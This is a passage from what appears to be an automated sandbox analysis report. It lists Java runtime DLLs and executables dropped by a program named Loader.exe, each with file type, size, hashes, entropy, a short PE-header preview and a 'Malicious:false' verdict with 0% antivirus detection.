                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............g_..g_..g_..._..g_..._..g_..._..g_..._..g_aT._..g_aT._..g_aT._..g_..f_..g_..._..g_.._..g_.._..g_..._..g_.._..g_Rich..g_........................PE..L...oPjW...........!...............................m.........................0............@..........................l..................X&..............@........(......................................@...............<....^.......................text...\........................... ..`.rdata..............................@..@.data...\"..........................@....rsrc...X&.......(..................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\glib-lite.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):400960
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.165546757090391
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:vxDvEpBGH7t7PB7Es7va/QdqOBYswIprNWhk+URpxfu4w7J:tvEpBGH7pN57vwQd6swIp5WhkRlfu4CJ
                                                                                                                                                                                                                                                                                                              MD5:767BBA46789597B120D01E48A685811E
                                                                                                                                                                                                                                                                                                              SHA1:D2052953DDE6002D590D0D89C2A052195364410A
                                                                                                                                                                                                                                                                                                              SHA-256:218D349986E2A0CD4A76F665434F455A8D452F1B27EAF9D01A120CB35DA13694
                                                                                                                                                                                                                                                                                                              SHA-512:86F7F7E87514DBC62C284083D66D5F250A24FC5CD7540AF573C3FB9D47B802BE5FFBBC709B638F8E066AB6E4BB396320F6E65A8016415366799C74772398B530
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j..'..{t..{t..{t.g.t).{t#..t-.{t#..t".{t#..t".{t#..t,.{tS..ty.{t.8.t".{t..zt..{tS..t/.{t#..t/.{tS..t/.{tRich..{t................PE..L...oPjW...........!.....V...........=.......p.....m.........................P............@.............................^...............................@.... ..h'......................................@............p...............................text....T.......V.................. ..`.rdata...j...p...l...Z..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..h'... ...(..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\gstreamer-lite.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):514112
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.805344203686025
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:Y5JbfdT5NYGe8m51QSWvopH1kdMDbA2ZoNnYX:Y5JV7eB3KopvnAe2YX
                                                                                                                                                                                                                                                                                                              MD5:8D0CE7151635322F1FE71A8CEA22A7D6
                                                                                                                                                                                                                                                                                                              SHA1:81E526D3BD968A57AF430ABB5F55A5C55166E579
                                                                                                                                                                                                                                                                                                              SHA-256:43C2AC74004F307117D80EE44D6D94DB2205C802AE6F57764810DEE17CFC914D
                                                                                                                                                                                                                                                                                                              SHA-512:3C78C0249B06A798106FEAF796AA61D3A849F379BD438BF0BB7BFED0DC9B7E7EA7DE689BC3874ED8B97FF2B3BA40265DED251896E03643B696EFDBF2E01AC88C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Es.J$..J$..J$....N$..Gv..I$..Gv.G$..Gv..G$..Gv..H$..7]..%$.....B$..7]..H$..J$...%..7]..K$..Gv.K$..7].K$..RichJ$..........PE..L...pPjW...........!................g..............m......................................@..........................F.......I..........................@.......lT...................................E..@............................................text............................... ..`.rdata..............................@..@.data....0...`..."...D..............@....rsrc................f..............@..@.reloc..lT.......V...j..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\hprof.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):132672
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.708436670828807
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:HGBc2vf2AWlvx+Kre9vVv3CoLORljxWEXyB/NK3GyNf9:mxvffVvyo0X8NKW+1
                                                                                                                                                                                                                                                                                                              MD5:6376B76728E4A873B2BB7233CBCD5659
                                                                                                                                                                                                                                                                                                              SHA1:3BE08074527D5B5BC4A1DDCEC41375E3B3A8A615
                                                                                                                                                                                                                                                                                                              SHA-256:4FDF86D78ABC66B44B8AFF4BBCE1F2A5D6D9900767BE3CAAE450409924DBC5AD
                                                                                                                                                                                                                                                                                                              SHA-512:955E7C5AB735183B491A753710B6F598A142A2876DDAE5AD301C3DA82A65CE82238E0F20C9F558F80138D58F8DC00B4EBD21483CEED0AABEEDA32CCA5D2E3D48
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........vu^............8Y...............................o..............................................Rich............................PE..L...oPjW...........!.....z...x......_..............m......................... ......^.....@.............................i...|...d.......................@........................................... ...@...............d............................text...Ny.......z.................. ..`.rdata...N.......P...~..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\instrument.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):115776
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.787384437276838
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:0LHPDcdivqC4xMfl/hAxfZ/t0QHQIM7iVxoQCpGlyir0wIOfnToIfemrVZQirM:0rPDco4xMNEfZ1LQG4igmvTBfem7QcM
                                                                                                                                                                                                                                                                                                              MD5:AB6ED0CFD0C52DBEDE1BE910EFA8A89B
                                                                                                                                                                                                                                                                                                              SHA1:83CBC2746A50C155261407ECE3D7A5C58AAD0437
                                                                                                                                                                                                                                                                                                              SHA-256:8A6FBB08E0F418A3BB80CC65233E7270C820741DD57525ED7FD3CC479A49396E
                                                                                                                                                                                                                                                                                                              SHA-512:41773183FC20E42BF208064163AA55658692B9221560146E4F6A676F96FC76541ED82F1EFDFA31F8C25BA42F271F7D9087DE681DA937BBF0EB2C781E027F1218
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........g0...c...c...c..c...c...c...cP..c...c.|.c...c.|.c...c.|.c...c.|.c...c.|.c...c.|.c...cRich...c........PE..L...oPjW...........!........................0.....m......................................@.........................@.......|...(.......................@...........p1.............................. ...@............0..0............................text...L........................... ..`.rdata...f...0...h..................@..@.data....,..........................@....rsrc...............................@..@.reloc..Z...........................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\j2pcsc.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16448
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.490137326885244
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:WCMJqfiSZzDonPV5TyVIbb8nYPLr7VblXT:WLJqrNkndQIsC7Vhj
                                                                                                                                                                                                                                                                                                              MD5:1F004C428E01F8BEB07B52EB9659A661
                                                                                                                                                                                                                                                                                                              SHA1:4D6AAB306CB1F4925890BF69FCDF32BBFE942B81
                                                                                                                                                                                                                                                                                                              SHA-256:1BDEFECDF8CFA3F6DA606AD4D8BD98EC81E4A244D459A141723CCB9DC47E57CB
                                                                                                                                                                                                                                                                                                              SHA-512:61888A778394950D2840E4D211196FFE1CB18FA45D092CBADBEDF2809BDED3D4421330CFE95392DD098E4AE3F6F8A3070E273FFCA2FB495C43C76332CA331DBF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3...w.x^w.x^w.x^...^v.x^l..^u.x^l..^u.x^l..^u.x^~..^r.x^w.y^[.x^l..^y.x^l..^v.x^l..^v.x^l..^v.x^Richw.x^........PE..L...oPjW...........!.........................0.....m.........................p.......!....@..........................7.......2..P....P...............(..@....`..`....0..............................`1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@....... ..............@....rsrc........P......."..............@..@.reloc.......`.......&..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\j2pkcs11.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):51264
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.576803205025954
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:urOHh9t7/GAzqHcGxAARrZT9ixHDyo/r0rV9LrBH1bjPEwhEdheBwHWQFgE/XudL:G+9t7/qHcGHuy/pb
                                                                                                                                                                                                                                                                                                              MD5:3A744B78C57CFADC772C6DE406B6B31E
                                                                                                                                                                                                                                                                                                              SHA1:A89BF280453C0BCF8C987B351C168AEB3D7F7141
                                                                                                                                                                                                                                                                                                              SHA-256:629393079539B1B9849704CE4757714D1CBE5C80E82C6BB3BC4445F4854EFA7B
                                                                                                                                                                                                                                                                                                              SHA-512:506A147F33C09FA7338E0560F850E42139D0875EF48C297DDB3CC3A29F12822011915FACCB21DA908CF51A462F0EBA56B6B37C71D9C0F842BDE4A697FB4FFB64
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O^;w.?U$.?U$.?U$.G.$.?U$...$.?U$.?T$&?U$...$.?U$...$.?U$...$.?U$...$.?U$...$.?U$...$.?U$Rich.?U$........................PE..L...oPjW...........!.....v...8......l..............m................................O1....@.............................u...|...<.......................@.......................................... ...@............................................text...~t.......v.................. ..`.rdata...'.......(...z..............@..@.data...............................@....rsrc...............................@..@.reloc..V...........................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jaas_nt.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):19520
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.452867740862137
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:45kF/QP8xkI6hgWIE0PVlyJSZ9nYPLr7+:4SqP7I6rkd4EfC7+
                                                                                                                                                                                                                                                                                                              MD5:503275E515E3F2770A62D11E386EADBF
                                                                                                                                                                                                                                                                                                              SHA1:C7BE65796AA0E490779F202C67EEC5E9FBB65113
                                                                                                                                                                                                                                                                                                              SHA-256:97B5D1C8E7AAACE5C86A418CB7418D3B0BA4F5E178DE3CF1031029F7F36832AF
                                                                                                                                                                                                                                                                                                              SHA-512:AC7C0CB626C2D821F0F4E392EE4E02C9E0093F019AA5B2947E0C7B3290A0098A3D9BB803AB44FD304CA1F1D272CFB7B775E3C75C72C7523FF7240F38440CFC3C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."..|fl./fl./fl./}.(/dl./}.*/gl./}../dl./o.'/al./fl./_l./}../kl./}.//gl./}../gl./}.)/gl./Richfl./................PE..L...pPjW...........!.........................0.....m.........................p............@..........................=.......8..d....P...............4..@....`..\....1...............................6..@............0...............................text............................... ..`.rdata..w....0......................@..@.data...`....@.......*..............@....rsrc........P.......,..............@..@.reloc.......`.......0..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jabswitch.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):30784
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.413942547146628
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:+HhfWinfwUFAvnb5TIUX+naSOu9MQQ5jhC7EY:cuin5FAvNTIUX+nbMQQ54EY
                                                                                                                                                                                                                                                                                                              MD5:530D5597E565654D378F3C87654CCABA
                                                                                                                                                                                                                                                                                                              SHA1:6FAC0866EE0E68149AC0A0D39097CEF8F93A5D9E
                                                                                                                                                                                                                                                                                                              SHA-256:0CFAA99AE669DDC00BD59B5857F725DFF5D4C09834E143AB1B5C5F0B5801D13B
                                                                                                                                                                                                                                                                                                              SHA-512:D7520A28C3054160FCD62C9D816A27266BE9333E00794434FB4529F0FF49A2B08E033B5E67A823E5C184EE2D19D7F615FF9EE643FE71C84011A7E5C03251F3B4
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............I...I...I..HI...I..JI...I..~I...I..GI...I...I..I...I...I..NI...I..II...IRich...I........PE..L....DjW.................0...,.......1.......@....@..................................<....@.................................dR..x....p...............`..@.......t....A...............................P..@............@..p............................text............0.................. ..`.rdata.......@.......4..............@..@.data........`.......N..............@....rsrc........p.......P..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java-rmi.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):15936
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.466457942735197
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:GpsbHnDiW6gejmSHhV8cGees7snYPLr7Wj53:GpsbHn/HS/8cresgC743
                                                                                                                                                                                                                                                                                                              MD5:CF2F023D2B5F0BFB2ECF8AEEA7C51481
                                                                                                                                                                                                                                                                                                              SHA1:6EB867B1AC656A0FC363DFAE4E2D582606D100FB
                                                                                                                                                                                                                                                                                                              SHA-256:355366D0C7D7406E2319C90DF2080C0FAE72D9D54E4563C48A09F55CA68D6B0C
                                                                                                                                                                                                                                                                                                              SHA-512:A2041925039238235ADC5FE8A9B818DFF577C6EA3C55A0DE08DA3DEDD8CD50DC240432BA1A0AEA5E8830DCDCCD3BFBF9CF8A4F21E9B56DC839E074E156FC008D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW..................................... ....@..........................`......B.....@..................................#..P....@..\............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata..z.... ......................@..@.data........0......................@....rsrc...\....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):126528
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.8082748642937725
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:Kw2b3Kr+uWU9XzFhziJ1TBZAhsIn/B9NZwMgjeNXLD:43KFFheLCBpV/
                                                                                                                                                                                                                                                                                                              MD5:73BD0B62B158C5A8D0CE92064600620D
                                                                                                                                                                                                                                                                                                              SHA1:63C74250C17F75FE6356B649C484AD5936C3E871
                                                                                                                                                                                                                                                                                                              SHA-256:E7B870DEB08BC864FA7FD4DEC67CEF15896FE802FAFB3009E1B7724625D7DA30
                                                                                                                                                                                                                                                                                                              SHA-512:EBA1CF977365446B35740471882C5209773A313DE653404A8D603245417D32A4E9F23E3B6CD85721143D2F9A0E46ED330C3D8BA8C24AEE390D137F9B5CD68D8F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!..r..r..r.W.r..r.W(r..r...r..r..(r..r...r..r.W.r..r..r..r.W)r..r.W.r..r.W.r..r.W.r..rRich..r................PE..L...qPjW...........!..... ...........(.......0.....m................................6N....@......................... u...B...U..........................@............5...............................S..@............0......<U..@....................text...b........ .................. ..`.rdata.......0.......$..............@..@.data...............................@....rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):191040
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.75061028420578
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:iUJiEoGLsncZizZQ7QBdCPdG3TBfMzrjZqMNGSplN2:iUJsnVzy7QBdC1G3TBEvFp6
                                                                                                                                                                                                                                                                                                              MD5:E3E51A21B00CDDE757E4247257AA7891
                                                                                                                                                                                                                                                                                                              SHA1:7F9E30153F1DF738179FFF084FCDBC4DAE697D18
                                                                                                                                                                                                                                                                                                              SHA-256:7E92648B919932C0FBFE56E9645D785D9E18F4A608DF06E7C0E84F7CB7401B54
                                                                                                                                                                                                                                                                                                              SHA-512:FC2981A1C4B2A1A3E7B28F7BF2BE44B0B6435FD43F085120946778F5C2C2CA73AD179796DEC0B92F0C6C8F6B63DD329EECC0AF1BB15392364C209DCF9CD6F7CA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+H..E...E...E.L.....E..E....E..E....E......E...D...E..E..{.E..E....E..E....E.Rich..E.........PE..L....DjW.....................&....................@..........................0......aN....@.................................L*..d.......................@............................................$..@............................................text...~........................... ..`.rdata...s.......t..................@..@.data....4...@....... ..............@....rsrc................6..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java_crw_demo.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):23616
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.620094371728742
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:Qp2dG5pC/ujTc8ZrEnrZm8WXLFnPV52WZQAnYPLr7lOGa:uvCGjJ0Q9ndRZdC71a
                                                                                                                                                                                                                                                                                                              MD5:1C47DD47EBD106C9E2279C7FCB576833
                                                                                                                                                                                                                                                                                                              SHA1:3BA9B89D9B265D8CEC6B5D6F80F7A28D2030A2D1
                                                                                                                                                                                                                                                                                                              SHA-256:58914AD5737F2DD3D50418A89ABBB7B30A0BD8C340A1975197EEA02B9E4F25B2
                                                                                                                                                                                                                                                                                                              SHA-512:091F50B2E621ED80BAFE2541421906DE1BCC35A0E912055B93E40CD903BE8B474103C0D8FECDF46E7F2F3C44BDADE64A857AB2B9CB5404306055150EE4ED002A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2..v...v...v.....+.t...m'$.u...v...\...m'&.w...m'..t...m'..{...m'#.w...m'".w...m'%.w...Richv...................PE..L...wPjW...........!.....*...........4.......@.....m................................F.....@..........................I..|....E..<....`...............D..@....p.......@...............................D..@............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data...(....P.......:..............@....rsrc........`.......<..............@..@.reloc..^....p.......@..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javacpl.cpl

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):160256
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.469497559123052
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:a2lpElIhbyyH3c1CX766zKELxKvFaPSnjZqMNJlGle:a2rE+xdW+76DEVKv8wv
                                                                                                                                                                                                                                                                                                              MD5:4E3C37A4DE0B5572D69AD79B7A388687
                                                                                                                                                                                                                                                                                                              SHA1:6B274E166641F9CE0170E99FE2D1F4319B75A9E8
                                                                                                                                                                                                                                                                                                              SHA-256:893A86E7B1DE81DEDAB4794732FCCD02790756A2DBE4815C102F039088DFCBD2
                                                                                                                                                                                                                                                                                                              SHA-512:8352A1CD859D17A27560448C6FFB0E8200096CAC744C8BB56330397FDE0B7F702E2295999D89FBAD74DF72DF200C391113A23A9B4342ABAC738167967533F9CD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d6.. We. We. We.;...9We.;...We.)/..)We. Wd..We.O!.(We.;...We.;...!We.;...!We.;...!We.Rich We.........................PE..L....HjW...........!.....r...........q....................................................@.............................Z.......d.... ..............................@...................................@............................................text....p.......r.................. ..`.rdata..jH.......J...v..............@..@.data...,3..........................@....rsrc........ ......................@..@.reloc..@............T..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javacpl.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):70208
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.353501201479367
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:jFVfr2k521ZnrawwMmqPXt+rP3b/9/YMCxx0OpPOrEE14EVHLAuDeGJiqrmehiV9:PxioMmqF+2x0MORLVq7qjh3rmKPNpwGg
                                                                                                                                                                                                                                                                                                              MD5:C2A59C7343D370BC57765896490331E5
                                                                                                                                                                                                                                                                                                              SHA1:A50AF979E08A65EB370763A7F70CDB0E179D705D
                                                                                                                                                                                                                                                                                                              SHA-256:40614FE8B91E01AD3562102E440BDBF5FAC5D9F7292C6B16A58F723BFFFE6066
                                                                                                                                                                                                                                                                                                              SHA-512:CA266F1B2E51F66D119E2D71E3377C229A3D583853FFB606C101AFEB41689ACE7D1F1594781091DA67F9BE9D09F3019BF048C0F819777E8F1827A56BEEC252C4
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._...1...1...1..9....1.j...1..9....1..9...1.....1...0.q.1.....1..9....1..9....1..9....1.Rich..1.................PE..L....HjW.................B...........B.......`....@..........................@......5C....@..................................}..x.......................@....0.......b...............................u..@............`......@{.......................text...,@.......B.................. ..`.rdata..x'...`...(...F..............@..@.data................n..............@....rsrc................p..............@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_font.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):57408
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.6711491011490285
                                                                                                                                                                                                                                                                                                              Encrypted:false
